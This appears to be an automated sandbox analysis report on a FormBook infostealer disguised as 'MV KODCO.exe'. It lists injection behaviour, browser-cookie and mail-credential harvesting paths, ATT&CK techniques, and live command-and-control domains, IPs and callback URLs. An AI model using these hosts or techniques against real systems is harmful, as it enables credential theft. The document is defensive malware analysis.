                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0061A66C
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006271FA
                Source: MV KODCO.exe, cMOROZNpvCGcdz.exe, 00000003.00000000.1894835049.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2933000663.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000000.2044068283.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: cMOROZNpvCGcdz.exe, 00000003.00000000.1894835049.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2933000663.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000000.2044068283.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: MV KODCO.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: cMOROZNpvCGcdz.exe, 00000003.00000000.1894835049.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2933000663.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000000.2044068283.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: cMOROZNpvCGcdz.exe, 00000003.00000000.1894835049.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000003.00000002.2933000663.0000000000E20000.00000002.00000001.00040000.00000000.sdmp, cMOROZNpvCGcdz.exe, 00000008.00000000.2044068283.0000000001410000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006065C4 cpuid 0_2_006065C4
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0063091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0063091D
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0065B340 GetUserNameW,0_2_0065B340
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00611E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00611E8E
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005FDDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2931811558.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1970475170.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933217296.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933301048.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2934945031.0000000005220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1972961447.0000000005F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2933293097.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1971212248.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: MV KODCO.exeBinary or memory string: WIN_81
                Source: MV KODCO.exeBinary or memory string: WIN_XP
                Source: MV KODCO.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: MV KODCO.exeBinary or memory string: WIN_XPe
                Source: MV KODCO.exeBinary or memory string: WIN_VISTA
                Source: MV KODCO.exeBinary or memory string: WIN_7
                Source: MV KODCO.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.420000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2931811558.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1970475170.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933217296.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2933301048.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2934945031.0000000005220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1972961447.0000000005F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2933293097.0000000002520000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1971212248.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00638C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00638C4F
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0063923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0063923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                2
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558145 Sample: MV KODCO.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 30 www.schedulemassage.xyz 2->30 32 www.huiguang.xyz 2->32 34 9 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected FormBook 2->48 52 4 other signatures 2->52 10 MV KODCO.exe 2 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 32->50 process4 signatures5 64 Binary is likely a compiled AutoIt script file 10->64 66 Writes to foreign memory regions 10->66 68 Maps a DLL or memory area into another process 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 cMOROZNpvCGcdz.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 ktmutil.exe 13 16->19         started        22 srdelayed.exe 16->22         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 24 cMOROZNpvCGcdz.exe 19->24 injected 28 firefox.exe 19->28         started        process12 dnsIp13 36 migorengya8.click 198.252.98.54, 50008, 50019, 50027 HAWKHOSTCA Canada 24->36 38 schedulemassage.xyz 3.33.130.190, 49749, 49760, 49771 AMAZONEXPANSIONGB United States 24->38 40 2 other IPs or domains 24->40 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                MV KODCO.exe37%ReversingLabsWin32.Trojan.AutoitInject
                MV KODCO.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.mcfunding.org/0598/0%Avira URL Cloudsafe
                http://www.migorengya8.click/y3dc/?1H=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&jD=VzTtTZ0%Avira URL Cloudsafe
                http://www.huiguang.xyz/hv6g/?jD=VzTtTZ&1H=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM=0%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=0%Avira URL Cloudsafe
                http://www.migorengya8.click/y3dc/0%Avira URL Cloudsafe
                http://www.migorengya8.click0%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/?1H=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&jD=VzTtTZ0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                mcfunding.org
                3.33.130.190
                truetrue
                  unknown
                  www.huiguang.xyz
                  154.92.61.37
                  truefalse
                    high
                    www.klohk.tech
                    103.224.182.242
                    truetrue
                      unknown
                      beingandbecoming.ltd
                      3.33.130.190
                      truetrue
                        unknown
                        migorengya8.click
                        198.252.98.54
                        truetrue
                          unknown
                          www.futurevision.life
                          203.161.49.193
                          truefalse
                            high
                            schedulemassage.xyz
                            3.33.130.190
                            truetrue
                              unknown
                              www.beingandbecoming.ltd
                              unknown
                              unknownfalse
                                unknown
                                www.migorengya8.click
                                unknown
                                unknownfalse
                                  unknown
                                  www.mcfunding.org
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.schedulemassage.xyz
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.migorengya8.click/y3dc/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.mcfunding.org/0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.mcfunding.org/0598/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.futurevision.life/hxmz/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.migorengya8.click/y3dc/?1H=ihLGZn7rk3oJmiIz33Bz1E4xhZDY72dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERgPwyb4b9y8rXeUu2h/5aaRRGXSXrvcfb4U=&jD=VzTtTZtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.huiguang.xyz/hv6g/?jD=VzTtTZ&1H=vSitAQgQO9xnWjtO9fvjetkh7TKEKyOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGP+O9AD54eipMHpO96aeC1LnvmikAK9niWdM=true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.beingandbecoming.ltd/79tr/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.beingandbecoming.ltd/79tr/?1H=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&jD=VzTtTZtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.migorengya8.clickcMOROZNpvCGcdz.exe, 00000008.00000002.2934945031.000000000527A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.ecosia.org/newtab/ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ktmutil.exe, 00000007.00000003.2165243004.0000000007F8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        203.161.49.193
                                                        www.futurevision.lifeMalaysia
                                                        45899VNPT-AS-VNVNPTCorpVNfalse
                                                        154.92.61.37
                                                        www.huiguang.xyzSeychelles
                                                        132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                        198.252.98.54
                                                        migorengya8.clickCanada
                                                        20068HAWKHOSTCAtrue
                                                        3.33.130.190
                                                        mcfunding.orgUnited States
                                                        8987AMAZONEXPANSIONGBtrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1558145
                                                        Start date and time:2024-11-19 03:23:08 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 4s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:9
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:2
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:MV KODCO.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@9/3@7/4
                                                        EGA Information:
                                                        • Successful, ratio: 66.7%
                                                        HCA Information:
                                                        • Successful, ratio: 94%
                                                        • Number of executed functions: 49
                                                        • Number of non-executed functions: 299
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target cMOROZNpvCGcdz.exe, PID 2412 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • VT rate limit hit for: MV KODCO.exe
                                                        TimeTypeDescription
                                                        21:25:05API Interceptor2185400x Sleep call for process: ktmutil.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        203.161.49.193PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                        • www.inspires.website/tv3i/
                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.futurevision.life/hxmz/
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • www.futurevision.life/hxmz/
                                                        Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
                                                        Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • www.eco-tops.website/n54u/
                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                        • www.futurevision.life/hxmz/
                                                        DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                        • www.harmonid.life/aq3t/
                                                        DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                        • www.harmonid.life/aq3t/
                                                        Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                        • www.fitlifa.xyz/6tsn/
                                                        Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                        • www.simplek.top/ep69/
                                                        154.92.61.37rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                        • www.huiguang.xyz/8hcr/
                                                        198.252.98.54Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.migorengya8.click/y3dc/
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • www.migorengya8.click/y3dc/
                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                        • www.migorengya8.click/y3dc/
                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                        • www.migorengya8.click/y3dc/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        www.huiguang.xyzArrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        www.klohk.techPROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                        • 103.224.182.242
                                                        www.futurevision.lifeArrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                        • 203.161.49.193
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        HAWKHOSTCAZiraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                        • 198.252.105.91
                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                        • 198.252.105.91
                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 198.252.98.54
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 198.252.98.54
                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                        • 198.252.105.91
                                                        x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                        • 198.252.105.91
                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                        • 198.252.105.91
                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                        • 198.252.105.91
                                                        NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                        • 198.252.105.91
                                                        NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                        • 198.252.105.91
                                                        POWERLINE-AS-APPOWERLINEDATACENTERHKCertificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        botx.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 156.252.113.254
                                                        Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        xd.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 45.202.220.136
                                                        rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                        • 154.215.72.110
                                                        rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                        • 154.92.61.37
                                                        meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 160.124.107.230
                                                        AMAZONEXPANSIONGBhttps://website-70396.convertflowpages.com/firstmarkinsuranceGet hashmaliciousHTMLPhisherBrowse
                                                        • 3.33.161.45
                                                        Order No 24.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                        • 52.223.1.163
                                                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
                                                        dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                        • 3.33.130.190
